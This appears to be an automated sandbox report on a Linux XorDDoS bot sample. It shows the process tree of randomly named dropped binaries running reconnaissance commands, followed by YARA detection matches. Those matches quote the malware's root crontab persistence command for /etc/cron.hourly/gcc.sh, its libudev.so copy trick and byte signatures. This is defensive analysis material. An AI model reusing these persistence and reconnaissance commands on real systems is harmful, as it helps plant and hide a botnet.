apkjkvmecw (PID: 6556, Parent: 6555, MD5: 5e9b44ef4b6879d3a78ac5291f279080) Arguments: /usr/bin/apkjkvmecw "cat resolv.conf" 6236

apkjkvmecw New Fork (PID: 6557, Parent: 6556)

fuck.elf New Fork (PID: 6558, Parent: 6236)

fuck.elf New Fork (PID: 6559, Parent: 6558)

apkjkvmecw (PID: 6559, Parent: 6558, MD5: 5e9b44ef4b6879d3a78ac5291f279080) Arguments: /usr/bin/apkjkvmecw gnome-terminal 6236

apkjkvmecw New Fork (PID: 6560, Parent: 6559)

fuck.elf New Fork (PID: 6561, Parent: 6236)

fuck.elf New Fork (PID: 6562, Parent: 6561)

apkjkvmecw (PID: 6562, Parent: 6561, MD5: 5e9b44ef4b6879d3a78ac5291f279080) Arguments: /usr/bin/apkjkvmecw whoami 6236

apkjkvmecw New Fork (PID: 6566, Parent: 6562)

fuck.elf New Fork (PID: 6563, Parent: 6236)

fuck.elf New Fork (PID: 6564, Parent: 6563)

apkjkvmecw (PID: 6564, Parent: 1860, MD5: 5e9b44ef4b6879d3a78ac5291f279080) Arguments: /usr/bin/apkjkvmecw uptime 6236

apkjkvmecw New Fork (PID: 6568, Parent: 6564)

fuck.elf New Fork (PID: 6565, Parent: 6236)

fuck.elf New Fork (PID: 6567, Parent: 6565)

apkjkvmecw (PID: 6567, Parent: 1860, MD5: 5e9b44ef4b6879d3a78ac5291f279080) Arguments: /usr/bin/apkjkvmecw ifconfig 6236

apkjkvmecw New Fork (PID: 6569, Parent: 6567)

fuck.elf New Fork (PID: 6572, Parent: 6236)

fuck.elf New Fork (PID: 6573, Parent: 6572)

zflxucbsae (PID: 6573, Parent: 6572, MD5: 579f2e7251034cd3379b5cabdac75866) Arguments: /usr/bin/zflxucbsae "ps -ef" 6236

zflxucbsae New Fork (PID: 6576, Parent: 6573)

fuck.elf New Fork (PID: 6574, Parent: 6236)

fuck.elf New Fork (PID: 6575, Parent: 6574)

zflxucbsae (PID: 6575, Parent: 1860, MD5: 579f2e7251034cd3379b5cabdac75866) Arguments: /usr/bin/zflxucbsae "cat resolv.conf" 6236

zflxucbsae New Fork (PID: 6581, Parent: 6575)

fuck.elf New Fork (PID: 6577, Parent: 6236)

fuck.elf New Fork (PID: 6578, Parent: 6577)

zflxucbsae (PID: 6578, Parent: 1860, MD5: 579f2e7251034cd3379b5cabdac75866) Arguments: /usr/bin/zflxucbsae id 6236

zflxucbsae New Fork (PID: 6582, Parent: 6578)

fuck.elf New Fork (PID: 6579, Parent: 6236)

fuck.elf New Fork (PID: 6580, Parent: 6579)

zflxucbsae (PID: 6580, Parent: 1860, MD5: 579f2e7251034cd3379b5cabdac75866) Arguments: /usr/bin/zflxucbsae "sleep 1" 6236

zflxucbsae New Fork (PID: 6585, Parent: 6580)

fuck.elf New Fork (PID: 6583, Parent: 6236)

fuck.elf New Fork (PID: 6584, Parent: 6583)

zflxucbsae (PID: 6584, Parent: 1860, MD5: 579f2e7251034cd3379b5cabdac75866) Arguments: /usr/bin/zflxucbsae ifconfig 6236

zflxucbsae New Fork (PID: 6586, Parent: 6584)

fuck.elf New Fork (PID: 6591, Parent: 6236)

fuck.elf New Fork (PID: 6592, Parent: 6591)

lnwhdmdpfq (PID: 6592, Parent: 6591, MD5: ffb8e74dd5874f58b7c45794e529643d) Arguments: /usr/bin/lnwhdmdpfq pwd 6236

lnwhdmdpfq New Fork (PID: 6595, Parent: 6592)

fuck.elf New Fork (PID: 6593, Parent: 6236)

fuck.elf New Fork (PID: 6594, Parent: 6593)

lnwhdmdpfq (PID: 6594, Parent: 1860, MD5: ffb8e74dd5874f58b7c45794e529643d) Arguments: /usr/bin/lnwhdmdpfq who 6236

lnwhdmdpfq New Fork (PID: 6599, Parent: 6594)

fuck.elf New Fork (PID: 6596, Parent: 6236)

fuck.elf New Fork (PID: 6597, Parent: 6596)

lnwhdmdpfq (PID: 6597, Parent: 1860, MD5: ffb8e74dd5874f58b7c45794e529643d) Arguments: /usr/bin/lnwhdmdpfq id 6236

lnwhdmdpfq New Fork (PID: 6603, Parent: 6597)

fuck.elf New Fork (PID: 6598, Parent: 6236)

fuck.elf New Fork (PID: 6600, Parent: 6598)

lnwhdmdpfq (PID: 6600, Parent: 1860, MD5: ffb8e74dd5874f58b7c45794e529643d) Arguments: /usr/bin/lnwhdmdpfq "echo \"find\"" 6236

lnwhdmdpfq New Fork (PID: 6604, Parent: 6600)

fuck.elf New Fork (PID: 6601, Parent: 6236)

fuck.elf New Fork (PID: 6602, Parent: 6601)

lnwhdmdpfq (PID: 6602, Parent: 1860, MD5: ffb8e74dd5874f58b7c45794e529643d) Arguments: /usr/bin/lnwhdmdpfq "grep \"A\"" 6236

lnwhdmdpfq New Fork (PID: 6605, Parent: 6602)

fuck.elf New Fork (PID: 6608, Parent: 6236)

fuck.elf New Fork (PID: 6609, Parent: 6608)

fuck.elf New Fork (PID: 6610, Parent: 6236)

fuck.elf New Fork (PID: 6611, Parent: 6610)

cuofybetod (PID: 6611, Parent: 1860, MD5: 554dddb463d9700eaaf0c0bcd370d82f) Arguments: /usr/bin/cuofybetod gnome-terminal 6236

cuofybetod New Fork (PID: 6613, Parent: 6611)

fuck.elf New Fork (PID: 6612, Parent: 6236)

fuck.elf New Fork (PID: 6614, Parent: 6612)

cuofybetod (PID: 6614, Parent: 1860, MD5: 554dddb463d9700eaaf0c0bcd370d82f) Arguments: /usr/bin/cuofybetod uptime 6236

cuofybetod New Fork (PID: 6618, Parent: 6614)

fuck.elf New Fork (PID: 6615, Parent: 6236)

fuck.elf New Fork (PID: 6616, Parent: 6615)

cuofybetod (PID: 6616, Parent: 1860, MD5: 554dddb463d9700eaaf0c0bcd370d82f) Arguments: /usr/bin/cuofybetod whoami 6236

cuofybetod New Fork (PID: 6620, Parent: 6616)

fuck.elf New Fork (PID: 6617, Parent: 6236)

fuck.elf New Fork (PID: 6619, Parent: 6617)

cuofybetod (PID: 6619, Parent: 1860, MD5: 554dddb463d9700eaaf0c0bcd370d82f) Arguments: /usr/bin/cuofybetod "ps -ef" 6236

cuofybetod New Fork (PID: 6621, Parent: 6619)

fuck.elf New Fork (PID: 6624, Parent: 6236)

fuck.elf New Fork (PID: 6625, Parent: 6624)

jmphmmthfs (PID: 6625, Parent: 6624, MD5: 940ae105b702a386949e8114f1f38621) Arguments: /usr/bin/jmphmmthfs whoami 6236

jmphmmthfs New Fork (PID: 6628, Parent: 6625)

fuck.elf New Fork (PID: 6626, Parent: 6236)

fuck.elf New Fork (PID: 6627, Parent: 6626)

jmphmmthfs (PID: 6627, Parent: 1860, MD5: 940ae105b702a386949e8114f1f38621) Arguments: /usr/bin/jmphmmthfs whoami 6236

jmphmmthfs New Fork (PID: 6633, Parent: 6627)

fuck.elf New Fork (PID: 6629, Parent: 6236)

fuck.elf New Fork (PID: 6630, Parent: 6629)

jmphmmthfs (PID: 6630, Parent: 1860, MD5: 940ae105b702a386949e8114f1f38621) Arguments: /usr/bin/jmphmmthfs sh 6236

jmphmmthfs New Fork (PID: 6635, Parent: 6630)

fuck.elf New Fork (PID: 6631, Parent: 6236)

fuck.elf New Fork (PID: 6632, Parent: 6631)

jmphmmthfs (PID: 6632, Parent: 1860, MD5: 940ae105b702a386949e8114f1f38621) Arguments: /usr/bin/jmphmmthfs uptime 6236

jmphmmthfs New Fork (PID: 6637, Parent: 6632)

fuck.elf New Fork (PID: 6634, Parent: 6236)

fuck.elf New Fork (PID: 6636, Parent: 6634)

jmphmmthfs (PID: 6636, Parent: 1860, MD5: 940ae105b702a386949e8114f1f38621) Arguments: /usr/bin/jmphmmthfs ls 6236

jmphmmthfs New Fork (PID: 6638, Parent: 6636)

systemd New Fork (PID: 6250, Parent: 6249)

snapd-env-generator (PID: 6250, Parent: 6249, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
fuck.elf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
fuck.elf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
fuck.elf	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
fuck.elf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
fuck.elf	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
fuck.elf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
fuck.elf	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
fuck.elf	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
Click to see the 3 entries

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/pzvxnaaphf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/pzvxnaaphf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/pzvxnaaphf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/pzvxnaaphf	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/pzvxnaaphf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/pzvxnaaphf	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/pzvxnaaphf	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/oklqvchkds	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/oklqvchkds	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/oklqvchkds	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/oklqvchkds	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/oklqvchkds	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/oklqvchkds	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/oklqvchkds	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/oklqvchkds	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ujuhiugmmi	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/xodlvzjoas	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/xodlvzjoas	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/xodlvzjoas	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/zfyjfaoiow	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zfyjfaoiow	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/zfyjfaoiow	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/ujuhiugmmi	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ujuhiugmmi	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/xodlvzjoas	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/xodlvzjoas	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/xodlvzjoas	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/xodlvzjoas	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/xodlvzjoas	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/hwcijqdbza	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/axppigwavk	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ggsxjmacxa	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ggsxjmacxa	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ggsxjmacxa	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/wjnxqdxblo	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/xocmdvejxu	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zfyjfaoiow	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/zfyjfaoiow	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/zfyjfaoiow	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/zfyjfaoiow	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/zfyjfaoiow	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/sanzuhhixf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ggsxjmacxa	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ggsxjmacxa	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ggsxjmacxa	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ggsxjmacxa	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/ggsxjmacxa	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/hwcijqdbza	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/hwcijqdbza	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/ujuhiugmmi	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
